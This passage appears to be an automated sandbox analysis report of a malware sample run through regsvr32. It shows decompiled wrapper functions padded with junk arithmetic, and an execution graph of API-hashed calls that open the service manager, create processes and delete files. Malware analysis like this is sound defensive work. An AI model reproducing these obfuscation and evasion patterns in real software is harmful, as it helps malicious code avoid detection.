                                                                                                                0x0024eae9
                                                                                                                0x0024eaf0
                                                                                                                0x0024eaf7
                                                                                                                0x0024eafb
                                                                                                                0x0024eb02
                                                                                                                0x0024eb09
                                                                                                                0x0024eb10
                                                                                                                0x0024eb17
                                                                                                                0x0024eb1e
                                                                                                                0x0024eb25
                                                                                                                0x0024eb29
                                                                                                                0x0024eb30
                                                                                                                0x0024eb49
                                                                                                                0x0024eb5a
                                                                                                                0x0024eb60

                                                                                                                APIs
                                                                                                                • SetFileInformationByHandle.KERNEL32(000B5C15,00000000,?,00000028,?,?,?,?,?,?,?,?,?,?,?,00000023), ref: 0024EB5A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.445844665.0000000000231000.00000020.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.445835581.0000000000230000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.445884454.0000000000254000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_230000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FileHandleInformation
                                                                                                                • String ID:
                                                                                                                • API String ID: 3935143524-0
                                                                                                                • Opcode ID: 62f4fd11f1bee2b778a12be1f39848d568871edb8fd1f68545c84305743f77cd
                                                                                                                • Instruction ID: ffc489184fc020cd7b1b94af0b296fd2da0242e536b2208345540ff3dbc18c35
                                                                                                                • Opcode Fuzzy Hash: 62f4fd11f1bee2b778a12be1f39848d568871edb8fd1f68545c84305743f77cd
                                                                                                                • Instruction Fuzzy Hash: 531116B6C0121DFFCF10DFA4990A9EEBF74FB44314F108089E914A6254D3B14B64AFA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00247DA0 Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 88%
                                                                                                                			E00247DA0(void* __ecx, struct _SHFILEOPSTRUCTW* __edx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t34;
				int _t44;
				signed int _t46;
				signed int _t47;
				struct _SHFILEOPSTRUCTW* _t54;

				_push(_a4);
				_t54 = __edx;
				_push(__edx);
				E0023C98A(_t34);
				_v12 = 0xcdb49a;
				_v12 = _v12 + 0x8f05;
				_v12 = _v12 + 0xffff9965;
				_v12 = _v12 ^ 0x00c100f7;
				_v16 = 0xfe6a9a;
				_v16 = _v16 + 0xffff1466;
				_v16 = _v16 ^ 0x00fd95e9;
				_v8 = 0xca762f;
				_v8 = _v8 << 0xe;
				_t46 = 0x7f;
				_v8 = _v8 / _t46;
				_t47 = 0x2e;
				_v8 = _v8 / _t47;
				_v8 = _v8 ^ 0x00082e4e;
				E00237F78(_t47, 0xffc5979d, _t47, 0xab, _t47, 0x3ddf729);
				_t44 = SHFileOperationW(_t54); // executed
				return _t44;
			}











                                                                                                                0x00247da7
                                                                                                                0x00247daa
                                                                                                                0x00247dac
                                                                                                                0x00247dae
                                                                                                                0x00247db3
                                                                                                                0x00247dbd
                                                                                                                0x00247dc6
                                                                                                                0x00247dcd
                                                                                                                0x00247dd4
                                                                                                                0x00247ddb
                                                                                                                0x00247de2
                                                                                                                0x00247de9
                                                                                                                0x00247df0
                                                                                                                0x00247df9
                                                                                                                0x00247dfe
                                                                                                                0x00247e06
                                                                                                                0x00247e0e
                                                                                                                0x00247e16
                                                                                                                0x00247e2d
                                                                                                                0x00247e36
                                                                                                                0x00247e3c

                                                                                                                APIs
                                                                                                                • SHFileOperationW.SHELL32(?), ref: 00247E36
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.445844665.0000000000231000.00000020.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.445835581.0000000000230000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.445884454.0000000000254000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_230000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FileOperation
                                                                                                                • String ID:
                                                                                                                • API String ID: 3080627654-0
                                                                                                                • Opcode ID: 2a16452b27a4fc3da9f362e710a0266374990953f3da1891371b7e6ecd306318
                                                                                                                • Instruction ID: 45c60d74af73033156b81c0e85074b14fd14e30a0f055bc02bbf5b2a54c80b65
                                                                                                                • Opcode Fuzzy Hash: 2a16452b27a4fc3da9f362e710a0266374990953f3da1891371b7e6ecd306318
                                                                                                                • Instruction Fuzzy Hash: 0E1179B1D04208FBDB14DFA9D80A9DEBBB5EB45314F208199E418A6241E7B55F149F40
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00233506 Relevance: 1.5, APIs: 1, Instructions: 47memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 72%
                                                                                                                			E00233506(void* __ecx, void* __edx, void* _a4, long _a8, intOrPtr _a12, long _a16, intOrPtr _a20) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t39;
				void* _t47;
				signed int _t49;

				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				E0023C98A(_t39);
				_v16 = 0xf4e2fc;
				_t49 = 0x3b;
				_v16 = _v16 / _t49;
				_v16 = _v16 ^ 0x00083f87;
				_v12 = 0x549d10;
				_v12 = _v12 << 0xd;
				_v12 = _v12 + 0xffff8515;
				_v12 = _v12 | 0x9f85c2ad;
				_v12 = _v12 ^ 0x9fa0e66d;
				_v8 = 0xbeaf63;
				_v8 = _v8 | 0x7acbe5f7;
				_v8 = _v8 << 0xf;
				_v8 = _v8 ^ 0x3b62dfe8;
				_v8 = _v8 ^ 0xcc9b72fd;
				E00237F78(_t49, 0xbd3f148a, _t49, 0x106, _t49, 0xba07f621);
				_t47 = RtlAllocateHeap(_a4, _a16, _a8); // executed
				return _t47;
			}









                                                                                                                0x0023350c
                                                                                                                0x0023350f
                                                                                                                0x00233512
                                                                                                                0x00233515
                                                                                                                0x00233518
                                                                                                                0x0023351d
                                                                                                                0x00233522
                                                                                                                0x00233533
                                                                                                                0x0023353b
                                                                                                                0x00233543
                                                                                                                0x0023354a
                                                                                                                0x00233551
                                                                                                                0x00233555
                                                                                                                0x0023355c
                                                                                                                0x00233563
                                                                                                                0x0023356a
                                                                                                                0x00233571
                                                                                                                0x00233578
                                                                                                                0x0023357c
                                                                                                                0x00233583
                                                                                                                0x0023359a
                                                                                                                0x002335ab
                                                                                                                0x002335b0

                                                                                                                APIs
                                                                                                                • RtlAllocateHeap.NTDLL(9FA0E66D,?,00083F87), ref: 002335AB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.445844665.0000000000231000.00000020.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.445835581.0000000000230000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.445884454.0000000000254000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_230000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 1279760036-0
                                                                                                                • Opcode ID: f96f459a1562cf0811398c59acc1a6a1e894971d13c8e85bf07d59f40b728169
                                                                                                                • Instruction ID: 3348ebbd0ed3fbd6771c3fb191f4d243f602650adc72133a48aff58be32b4c66
                                                                                                                • Opcode Fuzzy Hash: f96f459a1562cf0811398c59acc1a6a1e894971d13c8e85bf07d59f40b728169
                                                                                                                • Instruction Fuzzy Hash: B41125B1D00208BFCF04EFA4D84689EBFB5EB44740F208088F9146A221D3728B24EF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 002402D8 Relevance: 1.3, APIs: 1, Instructions: 60COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 85%
                                                                                                                			E002402D8(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t45;
				int _t59;
				signed int _t61;
				signed int _t62;
				signed int _t63;
				signed int _t64;
				void* _t75;

				_push(_a8);
				_t75 = __ecx;
				_push(_a4);
				_push(__ecx);
				E0023C98A(_t45);
				_v12 = 0xd4268f;
				_t61 = 0x55;
				_v12 = _v12 / _t61;
				_t62 = 0x39;
				_v12 = _v12 / _t62;
				_t63 = 0x19;
				_v12 = _v12 / _t63;
				_v12 = _v12 ^ 0x00038c24;
				_v16 = 0xae7fc4;
				_v16 = _v16 + 0x7c1;
				_v16 = _v16 ^ 0x00ac1f44;
				_v8 = 0x83f9bc;
				_v8 = _v8 ^ 0x1ab9b921;
				_v8 = _v8 | 0xa5451e1d;
				_t64 = 0x5c;
				_v8 = _v8 / _t64;
				_v8 = _v8 ^ 0x021ff71d;
				E00237F78(_t64, 0xbd3f148a, _t64, 0x72, _t64, 0x529e328);
				_t59 = CloseHandle(_t75); // executed
				return _t59;
			}













                                                                                                                0x002402df
                                                                                                                0x002402e2
                                                                                                                0x002402e4
                                                                                                                0x002402e8
                                                                                                                0x002402e9
                                                                                                                0x002402ee
                                                                                                                0x002402ff
                                                                                                                0x00240304
                                                                                                                0x0024030c
                                                                                                                0x00240311
                                                                                                                0x00240319
                                                                                                                0x0024031e
                                                                                                                0x00240323
                                                                                                                0x0024032a
                                                                                                                0x00240331
                                                                                                                0x00240338
                                                                                                                0x0024033f
                                                                                                                0x00240346
                                                                                                                0x0024034d
                                                                                                                0x00240357
                                                                                                                0x0024035f
                                                                                                                0x00240367
                                                                                                                0x0024037b
                                                                                                                0x00240384
                                                                                                                0x0024038a

                                                                                                                APIs
                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00240384
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.445844665.0000000000231000.00000020.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.445835581.0000000000230000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.445884454.0000000000254000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_230000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandle
                                                                                                                • String ID:
                                                                                                                • API String ID: 2962429428-0
                                                                                                                • Opcode ID: e059c3c066ff345504bba9c85b1d4992eba54445fe3d98b1d9d536134e0d9d68
                                                                                                                • Instruction ID: 7108f90ffa70f5c7a04d3180025419227052d6584d7599a7b8ad4918de900016
                                                                                                                • Opcode Fuzzy Hash: e059c3c066ff345504bba9c85b1d4992eba54445fe3d98b1d9d536134e0d9d68
                                                                                                                • Instruction Fuzzy Hash: 5C113D71E01208FFEB08DFA5D80A9EEBBB5EB84310F50C09AE504A7280E7B15F219F40
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:17.4%
                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                Signature Coverage:0%
                                                                                                                Total number of Nodes:1039
                                                                                                                Total number of Limit Nodes:15
                                                                                                                execution_graph 3790 3225d1 3795 3050cf 3790->3795 3792 322661 3831 317b25 3792->3831 3794 322675 3802 30638d 3795->3802 3797 306c56 4047 30cde0 3797->4047 3802->3797 3806 318ef8 GetPEB RtlAllocateHeap 3802->3806 3809 3117d2 GetPEB 3802->3809 3819 306c46 3802->3819 3823 3134da GetPEB RtlAllocateHeap 3802->3823 3827 31f94b GetPEB 3802->3827 3834 320e7a 3802->3834 3842 309af8 3802->3842 3846 308844 3802->3846 3856 309c1b 3802->3856 3869 3213a3 3802->3869 3880 3082d2 3802->3880 3890 31416e 3802->3890 3904 318131 3802->3904 3916 31d15e 3802->3916 3925 31fecb 3802->3925 3934 311a83 3802->3934 3937 31eec2 3802->3937 3947 3079cc 3802->3947 3951 318966 3802->3951 3960 320a01 3802->3960 3971 319285 3802->3971 3975 31fad1 3802->3975 3980 30a9cf 3802->3980 3989 3226fc 3802->3989 3994 321fc7 3802->3994 4001 308ee5 3802->4001 4007 31d4ae 3802->4007 4018 30ae33 3802->4018 4022 31604b 3802->4022 4028 3126f3 3802->4028 4031 30e65a 3802->4031 4038 313231 3802->4038 3806->3802 3809->3802 3819->3792 3823->3802 3827->3802 3832 307f78 GetPEB 3831->3832 3833 317b93 ExitProcess 3832->3833 3833->3794 3840 3211a2 3834->3840 3837 3212e6 3837->3802 3840->3837 4061 3191cc 3840->4061 4065 3102d8 3840->4065 4069 31a50a 3840->4069 4073 320575 3840->4073 4077 322545 3840->4077 3844 309b12 3842->3844 3843 321e49 GetPEB RtlAllocateHeap LoadLibraryW 3843->3844 3844->3843 3845 309c05 3844->3845 3845->3802 3848 308b4a 3846->3848 3852 308c94 3848->3852 3855 308c92 3848->3855 4115 303466 3848->4115 4119 306e01 3848->4119 4123 31ed7b 3848->4123 4127 30303a 3848->4127 4132 307761 3848->4132 3854 320575 GetPEB 3852->3854 3854->3855 3855->3802 3865 30a250 3856->3865 3857 31ed7b 2 API calls 3857->3865 3860 306e01 2 API calls 3860->3865 3862 30a4b4 3866 31ed7b 2 API calls 3862->3866 3863 30a4b2 3863->3802 3865->3857 3865->3860 3865->3862 3865->3863 3868 303466 2 API calls 3865->3868 4154 30364e 3865->4154 4165 319862 3865->4165 4169 31f5d9 3865->4169 4173 30d467 3865->4173 4177 31f94b 3865->4177 3866->3863 3868->3865 3875 3217ea 3869->3875 3870 3219e8 3872 3102d8 2 API calls 3870->3872 3871 322545 GetPEB 3871->3875 3874 3219e6 3872->3874 3874->3802 3875->3870 3875->3871 3875->3874 3876 31a50a 2 API calls 3875->3876 3877 31f5d9 2 API calls 3875->3877 3879 31f94b GetPEB 3875->3879 4213 31eab3 3875->4213 4217 318eb3 3875->4217 3876->3875 3877->3875 3879->3875 3889 30855b 3880->3889 3881 31f5d9 2 API calls 3881->3889 3882 308648 4235 308fe9 3882->4235 3884 308646 3884->3802 3885 320575 GetPEB 3885->3889 3886 318eb3 GetPEB 3886->3889 3888 31f94b GetPEB 3888->3889 3889->3881 3889->3882 3889->3884 3889->3885 3889->3886 3889->3888 4221 304b40 3889->4221 3894 31468e 3890->3894 3893 31f5d9 2 API calls 3893->3894 3894->3893 3895 3146c9 3894->3895 3896 30303a GetPEB RtlAllocateHeap 3894->3896 3897 314876 3894->3897 3901 31f94b GetPEB 3894->3901 4269 30d2c9 3894->4269 4273 309291 3894->4273 4277 312519 3894->4277 3899 3117d2 GetPEB 3895->3899 3896->3894 3897->3897 3900 3146df 3899->3900 3902 3117d2 GetPEB 3900->3902 3901->3894 3903 3146f2 3902->3903 3903->3802 4281 311919 3904->4281 3906 31857d 3907 30cca2 GetPEB 3906->3907 3908 3185ac 3906->3908 3909 31f5d9 GetPEB RtlAllocateHeap 3906->3909 3911 3186e9 3906->3911 3912 30d467 GetPEB 3906->3912 3914 318eb3 GetPEB 3906->3914 3915 31f94b GetPEB 3906->3915 3907->3906 3910 304b40 2 API calls 3908->3910 3909->3906 3913 3185cb 3910->3913 3911->3911 3912->3906 3913->3802 3914->3906 3915->3906 3921 31d360 3916->3921 3917 306e01 2 API calls 3917->3921 3919 31ed7b 2 API calls 3919->3921 3920 31d3be 3920->3802 3921->3917 3921->3919 3921->3920 3922 308e38 2 API calls 3921->3922 3923 31d3ab 3921->3923 4284 32267c 3921->4284 3922->3921 3924 31ed7b 2 API calls 3923->3924 3924->3920 3928 31fee5 3925->3928 3927 31f5d9 GetPEB RtlAllocateHeap 3927->3928 3928->3927 3930 303466 2 API calls 3928->3930 3931 320568 3928->3931 3932 30d467 GetPEB 3928->3932 3933 31f94b GetPEB 3928->3933 4288 314e54 3928->4288 4298 32224c 3928->4298 3930->3928 3931->3802 3932->3928 3933->3928 3935 30303a 2 API calls 3934->3935 3936 311b14 3935->3936 3936->3802 3944 31ef01 3937->3944 3940 3125cd GetPEB 3940->3944 3941 31f5b4 3941->3802 3944->3940 3944->3941 3946 3117d2 GetPEB 3944->3946 4306 311b29 3944->4306 4318 31e168 3944->4318 4329 31519c 3944->4329 4347 31bd63 3944->4347 4364 312b1f 3944->4364 3946->3944 3948 3079e8 3947->3948 3949 307f78 GetPEB 3948->3949 3950 307a5b 3949->3950 3950->3802 3959 318c0a 3951->3959 3952 31f5d9 2 API calls 3952->3959 3953 318cc1 4525 317098 3953->4525 3954 318eb3 GetPEB 3954->3959 3956 318cbf 3956->3802 3958 31f94b GetPEB 3958->3959 3959->3952 3959->3953 3959->3954 3959->3956 3959->3958 4521 302263 3959->4521 3969 320a22 3960->3969 3964 30303a 2 API calls 3964->3969 3967 320ddc 3967->3802 3969->3964 3969->3967 4549 301a5f 3969->4549 4557 30aebb 3969->4557 4580 30d4bc 3969->4580 4600 316e97 3969->4600 4607 319a0c 3969->4607 4619 30c151 3969->4619 4627 30958a 3969->4627 3972 31952d 3971->3972 3973 31960e 3972->3973 3974 30cca2 GetPEB 3972->3974 3973->3802 3974->3972 3977 31fbc6 3975->3977 3976 31fc88 3976->3802 3977->3976 4740 30d3bf 3977->4740 4744 30c0ba 3977->4744 3985 30ac19 3980->3985 3984 30adad 3984->3802 3985->3984 3988 3117d2 GetPEB 3985->3988 4748 320de9 3985->4748 4752 312657 3985->4752 4756 3022f7 3985->4756 4763 313e11 3985->4763 4766 307c7a 3985->4766 3988->3985 3990 311919 GetPEB 3989->3990 3991 3227a3 3990->3991 4774 31ee14 3991->4774 3998 3221ad 3994->3998 3996 322212 3997 310231 GetPEB 3996->3997 3999 322210 3997->3999 3998->3996 3998->3999 4000 30303a 2 API calls 3998->4000 4778 316d6b 3998->4778 3999->3802 4000->3998 4002 308f94 4001->4002 4003 30303a 2 API calls 4002->4003 4004 308f9c 4002->4004 4006 308fb3 4002->4006 4003->4002 4782 303f5a 4004->4782 4006->3802 4013 31dc82 4007->4013 4009 310184 GetPEB 4009->4013 4010 30d467 GetPEB 4010->4013 4011 31f5d9 GetPEB RtlAllocateHeap 4011->4013 4013->4009 4013->4010 4013->4011 4014 31df19 4013->4014 4015 303466 2 API calls 4013->4015 4016 31f94b GetPEB 4013->4016 4815 303e99 4013->4815 4819 317a67 4013->4819 4823 313cbe 4013->4823 4014->3802 4015->4013 4016->4013 4019 30ae46 4018->4019 4020 307f78 GetPEB 4019->4020 4021 30aeaf 4020->4021 4021->3802 4026 316226 4022->4026 4025 302263 GetPEB 4025->4026 4026->4025 4027 316266 4026->4027 4827 30ca3c 4026->4827 4830 317b9e 4026->4830 4027->3802 4029 3079cc GetPEB 4028->4029 4030 31277c 4029->4030 4030->3802 4036 30e68a 4031->4036 4032 30eb20 4033 304e8f GetPEB 4032->4033 4035 30eb1e 4033->4035 4034 30303a 2 API calls 4034->4036 4035->3802 4036->4032 4036->4034 4036->4035 4037 304e8f GetPEB 4036->4037 4037->4036 4040 31324b 4038->4040 4042 31343d 4040->4042 4043 31343b 4040->4043 4045 30303a 2 API calls 4040->4045 4868 31e5ed 4040->4868 4878 318cf2 4040->4878 4882 30bdeb 4040->4882 4044 3117d2 GetPEB 4042->4044 4043->3802 4044->4043 4045->4040 4059 30d14d 4047->4059 4048 31f5d9 2 API calls 4048->4059 4049 30d27f 4052 302263 GetPEB 4049->4052 4051 318eb3 GetPEB 4051->4059 4053 30d297 4052->4053 4991 3035b1 4053->4991 4054 31f94b GetPEB 4054->4059 4057 31d15e 4 API calls 4057->4059 4058 30d27d 4058->3819 4059->4048 4059->4049 4059->4051 4059->4054 4059->4057 4059->4058 4060 304b40 2 API calls 4059->4060 4975 321a0a 4059->4975 4982 30c4e5 4059->4982 4060->4059 4062 3191ec 4061->4062 4081 307f78 4062->4081 4066 3102ee 4065->4066 4067 307f78 GetPEB 4066->4067 4068 310380 CloseHandle 4067->4068 4068->3840 4070 31a53c 4069->4070 4071 307f78 GetPEB 4070->4071 4072 31a5d0 CreateFileW 4071->4072 4072->3840 4074 32058d 4073->4074 4111 3197b1 4074->4111 4078 322558 4077->4078 4079 307f78 GetPEB 4078->4079 4080 3225c5 4079->4080 4080->3840 4082 308032 4081->4082 4083 308055 4081->4083 4087 30806b 4082->4087 4083->3840 4085 308040 4090 3166c8 4085->4090 4094 3032ac GetPEB 4087->4094 4089 30812d 4089->4085 4091 3166ed 4090->4091 4093 31680d 4091->4093 4095 30bb14 4091->4095 4093->4083 4094->4089 4096 30bce5 4095->4096 4103 31a5eb 4096->4103 4099 30bd2c 4101 30bd62 4099->4101 4102 3166c8 GetPEB 4099->4102 4101->4093 4102->4101 4104 31a602 4103->4104 4105 307f78 GetPEB 4104->4105 4106 30bd0c 4105->4106 4106->4099 4107 3031ea 4106->4107 4108 303200 4107->4108 4109 307f78 GetPEB 4108->4109 4110 3032a0 4109->4110 4110->4099 4112 3197d5 4111->4112 4113 307f78 GetPEB 4112->4113 4114 319852 4113->4114 4114->3840 4116 30348b 4115->4116 4117 307f78 GetPEB 4116->4117 4118 3034f4 SHGetFolderPathW 4117->4118 4118->3848 4120 306e19 4119->4120 4121 307f78 GetPEB 4120->4121 4122 306ea5 OpenSCManagerW 4121->4122 4122->3848 4124 31ed91 4123->4124 4125 307f78 GetPEB 4124->4125 4126 31ee09 CloseServiceHandle 4125->4126 4126->3848 4139 31345b 4127->4139 4131 303122 4131->3848 4138 3078e4 4132->4138 4134 30799d 4150 3091f2 4134->4150 4135 320575 GetPEB 4135->4138 4137 30799b 4137->3848 4138->4134 4138->4135 4138->4137 4146 310184 4138->4146 4140 307f78 GetPEB 4139->4140 4141 30310a 4140->4141 4142 303506 4141->4142 4143 303522 4142->4143 4144 307f78 GetPEB 4143->4144 4145 30359f RtlAllocateHeap 4144->4145 4145->4131 4147 31019a 4146->4147 4148 307f78 GetPEB 4147->4148 4149 310225 4148->4149 4149->4138 4151 30920b 4150->4151 4152 307f78 GetPEB 4151->4152 4153 309282 4152->4153 4153->4137 4157 303678 4154->4157 4156 3117d2 GetPEB 4156->4157 4157->4156 4159 303df0 4157->4159 4162 30303a GetPEB RtlAllocateHeap 4157->4162 4163 31ed7b 2 API calls 4157->4163 4181 30cd1c 4157->4181 4185 31640e 4157->4185 4189 308e38 4157->4189 4193 3032b3 4157->4193 4197 30cca2 4157->4197 4159->3865 4162->4157 4163->4157 4166 3198a4 4165->4166 4167 307f78 GetPEB 4166->4167 4168 31992e 4167->4168 4168->3865 4170 31f5f3 4169->4170 4171 30303a 2 API calls 4170->4171 4172 31f6bd 4171->4172 4172->3865 4172->4172 4174 30d492 4173->4174 4200 30adb7 4174->4200 4178 31f960 4177->4178 4203 3117d2 4178->4203 4182 30cd46 4181->4182 4183 307f78 GetPEB 4182->4183 4184 30cdc8 4183->4184 4184->4157 4186 316424 4185->4186 4187 307f78 GetPEB 4186->4187 4188 3164bd 4187->4188 4188->4157 4190 308e54 4189->4190 4191 307f78 GetPEB 4190->4191 4192 308ed4 OpenServiceW 4191->4192 4192->4157 4194 3032ec 4193->4194 4195 307f78 GetPEB 4194->4195 4196 303397 4195->4196 4196->4157 4198 307f78 GetPEB 4197->4198 4199 30cd13 4198->4199 4199->4157 4201 307f78 GetPEB 4200->4201 4202 30ae2c 4201->4202 4202->3865 4204 3117e2 4203->4204 4205 31345b GetPEB 4204->4205 4206 3118fd 4205->4206 4209 306f64 4206->4209 4210 306f81 4209->4210 4211 307f78 GetPEB 4210->4211 4212 307002 4211->4212 4212->3865 4214 31ead4 4213->4214 4215 307f78 GetPEB 4214->4215 4216 31eb4e SetFileInformationByHandle 4215->4216 4216->3875 4218 318ed5 4217->4218 4219 30adb7 GetPEB 4218->4219 4220 318ef0 4219->4220 4220->3875 4222 304b5a 4221->4222 4245 3125cd 4222->4245 4225 3125cd GetPEB 4226 304dff 4225->4226 4227 3125cd GetPEB 4226->4227 4228 304e15 4227->4228 4229 3091f2 GetPEB 4228->4229 4230 304e30 4229->4230 4231 3091f2 GetPEB 4230->4231 4232 304e4c 4231->4232 4249 317da0 4232->4249 4234 304e81 4234->3889 4236 309003 4235->4236 4237 31f5d9 2 API calls 4236->4237 4238 3091a5 4237->4238 4261 321c9b 4238->4261 4241 31f94b GetPEB 4242 3091d7 4241->4242 4265 307bc6 4242->4265 4244 3091e9 4244->3884 4246 3125e3 4245->4246 4253 30218f 4246->4253 4250 317db3 4249->4250 4251 307f78 GetPEB 4250->4251 4252 317e32 SHFileOperationW 4251->4252 4252->4234 4254 3021a7 4253->4254 4257 307b24 4254->4257 4258 307b3c 4257->4258 4259 307f78 GetPEB 4258->4259 4260 30221a 4259->4260 4260->4225 4262 321cba 4261->4262 4263 30adb7 GetPEB 4262->4263 4264 3091c4 4263->4264 4264->4241 4266 307bd6 4265->4266 4267 307f78 GetPEB 4266->4267 4268 307c6e DeleteFileW 4267->4268 4268->4244 4270 30d2ee 4269->4270 4271 307f78 GetPEB 4270->4271 4272 30d34d 4271->4272 4272->3894 4274 3092b3 4273->4274 4275 307f78 GetPEB 4274->4275 4276 30932f 4275->4276 4276->3894 4278 312532 4277->4278 4279 307f78 GetPEB 4278->4279 4280 31259c 4279->4280 4280->3894 4282 307f78 GetPEB 4281->4282 4283 3119a8 4282->4283 4283->3906 4285 32268c 4284->4285 4286 307f78 GetPEB 4285->4286 4287 3226f0 4286->4287 4287->3921 4289 314e7d 4288->4289 4290 3125cd GetPEB 4289->4290 4291 31504f 4290->4291 4302 30816b 4291->4302 4293 31508e 4294 3102d8 2 API calls 4293->4294 4297 315099 4293->4297 4295 3150b6 4294->4295 4296 3102d8 2 API calls 4295->4296 4296->4297 4297->3928 4299 322274 4298->4299 4300 30adb7 GetPEB 4299->4300 4301 322299 4300->4301 4301->3928 4303 3081a6 4302->4303 4304 307f78 GetPEB 4303->4304 4305 308221 CreateProcessW 4304->4305 4305->4293 4316 311b59 4306->4316 4307 3123a5 4310 3117d2 GetPEB 4307->4310 4308 30303a 2 API calls 4308->4316 4309 3117d2 GetPEB 4309->4316 4313 3123a3 4310->4313 4313->3944 4316->4307 4316->4308 4316->4309 4316->4313 4373 317730 4316->4373 4380 31af0b 4316->4380 4395 316845 4316->4395 4399 31fd42 4316->4399 4403 31490e 4316->4403 4327 31e468 4318->4327 4320 31f5d9 2 API calls 4320->4327 4321 30303a 2 API calls 4321->4327 4322 31e5e8 4322->4322 4323 30adb7 GetPEB 4323->4327 4324 31e4a9 4325 3117d2 GetPEB 4324->4325 4326 31e4b7 4325->4326 4326->3944 4327->4320 4327->4321 4327->4322 4327->4323 4327->4324 4328 31f94b GetPEB 4327->4328 4438 317e3d 4327->4438 4328->4327 4346 315be0 4329->4346 4330 30303a GetPEB RtlAllocateHeap 4330->4346 4331 31fd42 GetPEB 4331->4346 4332 31600d 4335 3117d2 GetPEB 4332->4335 4333 315db1 4449 30e4f5 4333->4449 4334 30e4f5 2 API calls 4334->4346 4338 315e22 4335->4338 4337 31f5d9 2 API calls 4337->4346 4338->3944 4339 315dc6 4453 30ec15 4339->4453 4342 30adb7 GetPEB 4342->4346 4344 31f94b GetPEB 4344->4346 4345 31f94b GetPEB 4345->4338 4346->4330 4346->4331 4346->4332 4346->4333 4346->4334 4346->4337 4346->4342 4346->4344 4457 30d360 4346->4457 4348 31bdce 4347->4348 4349 31ece4 GetPEB 4348->4349 4351 31f5d9 2 API calls 4348->4351 4355 3117d2 GetPEB 4348->4355 4357 31ced6 4348->4357 4359 31ceef 4348->4359 4361 31f94b GetPEB 4348->4361 4363 316561 GetPEB 4348->4363 4461 303129 4348->4461 4465 313d5b 4348->4465 4469 308d7e 4348->4469 4473 306d15 4348->4473 4476 3135a3 4348->4476 4485 30cafe 4348->4485 4489 31038b 4348->4489 4349->4348 4351->4348 4355->4348 4493 31ece4 4357->4493 4359->3944 4361->4348 4363->4348 4367 312b47 4364->4367 4366 312f8c 4369 3117d2 GetPEB 4366->4369 4367->4366 4368 312f8a 4367->4368 4370 30303a 2 API calls 4367->4370 4372 31fd42 GetPEB 4367->4372 4505 31a916 4367->4505 4512 31df2b 4367->4512 4368->3944 4369->4368 4370->4367 4372->4367 4375 31775f 4373->4375 4374 317a3f 4377 304e8f GetPEB 4374->4377 4375->4374 4376 317a3d 4375->4376 4379 30303a 2 API calls 4375->4379 4410 304e8f 4375->4410 4376->4316 4377->4376 4379->4375 4384 31af45 4380->4384 4381 31bd34 4382 312519 GetPEB 4381->4382 4385 31bd32 4382->4385 4383 30303a 2 API calls 4383->4384 4384->4381 4384->4383 4384->4385 4387 31f5d9 GetPEB RtlAllocateHeap 4384->4387 4392 3117d2 GetPEB 4384->4392 4393 30d2c9 GetPEB 4384->4393 4394 31f94b GetPEB 4384->4394 4414 31fe12 4384->4414 4418 31ceff 4384->4418 4422 30500a 4384->4422 4426 304f68 4384->4426 4430 30eb4b 4384->4430 4385->4316 4387->4384 4392->4384 4393->4384 4394->4384 4396 316858 4395->4396 4397 31fd42 GetPEB 4396->4397 4398 3168c1 4397->4398 4398->4316 4400 31fd60 4399->4400 4434 316ca3 4400->4434 4404 314930 4403->4404 4405 30303a 2 API calls 4404->4405 4406 314e35 4404->4406 4408 314e1e 4404->4408 4409 3150d4 GetPEB 4404->4409 4405->4404 4407 3117d2 GetPEB 4406->4407 